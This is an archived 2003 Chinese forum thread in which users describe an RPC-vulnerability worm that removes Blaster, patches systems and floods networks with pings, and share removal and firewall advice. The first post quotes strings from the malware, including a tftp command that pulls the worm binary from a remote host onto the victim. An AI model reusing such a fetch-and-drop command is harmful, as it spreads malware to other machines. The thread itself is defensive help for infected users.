自由居居士 发表于 2003-8-30 22:50:00

[转帖]最新RPC漏洞病毒.关于最近的疯狂ping

该病毒的特点是将“冲击波”(Worm.Blaster)病

毒干掉,并在系统内值入,预防冲击波病毒的疫苗。

然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然

后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,

消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意

作恶,病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此广大用户,

设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。


如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒

SVCHOST.EXE 大小是19.2K
DLLHOST.EXE 大小是10.K

DLLHOST.EXE里面有这样的话!


引用:

=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE

这2个文件在在:%Windir%\system32\wins\目录里..(注意:不是:%Windir%\system32\..)


紧急解决方案:
停止一下两个服务:

Network connections Sharing
WINS Client

在:%Windir%\system32\wins\
目录下删除:

SVCHOST.EXE
DLLHOST.EXE

这两个文件,安装防火墙,并禁止PING。

猴子很忙 发表于 2003-8-31 12:08:00

防火墙跳个不停

wtuje 发表于 2003-9-7 08:59:00

请问,要是我要共享,又要不受这病毒,那该怎么办,因为我们是共享上网的

带你去看海 发表于 2003-9-7 09:34:00

有点麻烦。。。。。。。。

sai 发表于 2003-9-7 10:03:00

把日期改到2004年以后呀

wtuje 发表于 2003-9-7 12:35:00

唉,没用的,我改到了2005,还是这样 ,要卡的,CPU利用率到快一百了,,我不共享马上就好了,有没有别的办法啊

自由居居士 发表于 2003-9-7 15:18:00

看来还是取消网络共乡有效啊~~

煎饼 发表于 2003-9-7 21:31:00

删除染毒文件,安装补丁,然后安装天网防火墙,这样就不会再次感染
页: [1]
查看完整版本: [转帖]最新RPC漏洞病毒.关于最近的疯狂ping